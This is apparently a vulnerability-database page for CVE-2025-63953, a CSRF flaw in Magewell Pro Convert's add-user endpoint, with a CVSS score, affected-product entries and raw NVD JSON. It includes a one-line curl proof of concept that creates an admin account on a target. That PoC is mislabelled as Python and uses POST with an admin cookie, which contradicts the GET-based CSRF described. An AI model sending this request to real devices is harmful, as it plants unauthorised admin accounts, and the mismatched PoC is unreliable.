Security Vulnerability Report
中文
CVE-2025-63953 CVSS 6.5 MEDIUM

CVE-2025-63953

Published: 2025-11-24 17:16:09
Last Modified: 2025-12-30 17:58:55

Description

A Cross-Site Request Forgery (CSRF) in the /usapi?method=add-user component of Magewell Pro Convert v1.2.213 allows attackers to arbitrarily create accounts via a crafted GET request.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:magewell:ultra_encode_hdmi_firmware:2.3.206:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:magewell:ultra_encode_hdmi:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:magewell:ultra_encode_sdi_firmware:2.3.206:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:magewell:ultra_encode_sdi:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:magewell:ultra_encode_hdmi_plus_firmware:2.3.206:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:magewell:ultra_encode_hdmi_plus:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:magewell:ultra_encode_sdi_plus_firmware:2.3.206:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:magewell:ultra_encode_sdi_plus:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:magewell:ultra_encode_aio_firmware:2.3.206:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:magewell:ultra_encode_aio:-:*:*:*:*:*:*:* - NOT VULNERABLE
Magewell Pro Convert < v1.2.214

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
curl -X POST https://target/usapi?method=add-user -d 'username=attacker&password=attacker123&role=admin' -H 'Cookie: session=admin_session'

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63953", "sourceIdentifier": "[email protected]", "published": "2025-11-24T17:16:08.760", "lastModified": "2025-12-30T17:58:54.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-Site Request Forgery (CSRF) in the /usapi?method=add-user component of Magewell Pro Convert v1.2.213 allows attackers to arbitrarily create accounts via a crafted GET request."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:ultra_encode_hdmi_firmware:2.3.206:*:*:*:*:*:*:*", "matchCriteriaId": "9EBB246F-AE8D-480A-AE2C-E7D093A30195"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:ultra_encode_hdmi:-:*:*:*:*:*:*:*", "matchCriteriaId": "4CC31127-AB61-4754-880C-99E5B7C3452C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:ultra_encode_sdi_firmware:2.3.206:*:*:*:*:*:*:*", "matchCriteriaId": "05F10943-501A-43A6-A45D-6DC7D490706C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:ultra_encode_sdi:-:*:*:*:*:*:*:*", "matchCriteriaId": "2C99D9AB-1101-4146-A36A-91639736DE79"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:ultra_encode_hdmi_plus_firmware:2.3.206:*:*:*:*:*:*:*", "matchCriteriaId": "E4EB611F-B561-4904-9E24-FF69D4063156"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:ultra_encode_hdmi_plus:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8EB5460-3EC5-4A68-8EBE-AA7181778587"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:ultra_encode_sdi_plus_firmware:2.3.206:*:*:*:*:*:*:*", "matchCriteriaId": "E765AED8-6C62-4380-BA4C-1399668373F9"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:ultra_encode_sdi_plus:-:*:*:*:*:*:*:*", "matchCriteriaId": "921BD6B9-7983-47A0-9345-7157ED9C6FA6"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:magewell:ultra_encode_aio_firmware:2.3.206:*:*:*:*:*:*:*", "matchCriteriaId": "D0D501AB-2A8E-4554-8F44-BC1EFCFD7A2A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:magewell:ultra_encode_aio:-:*:*:*:*:*:*:*", "matchCriteriaId": "CB453C74-42EA-4096-A03A-44391D71D333"}]}]}], "references": [{"url": "https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-63953", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Mitigation"]}, {"url": "https://www.magewell.com", "source": "[email protected]", "tags": ["Product"]}]}}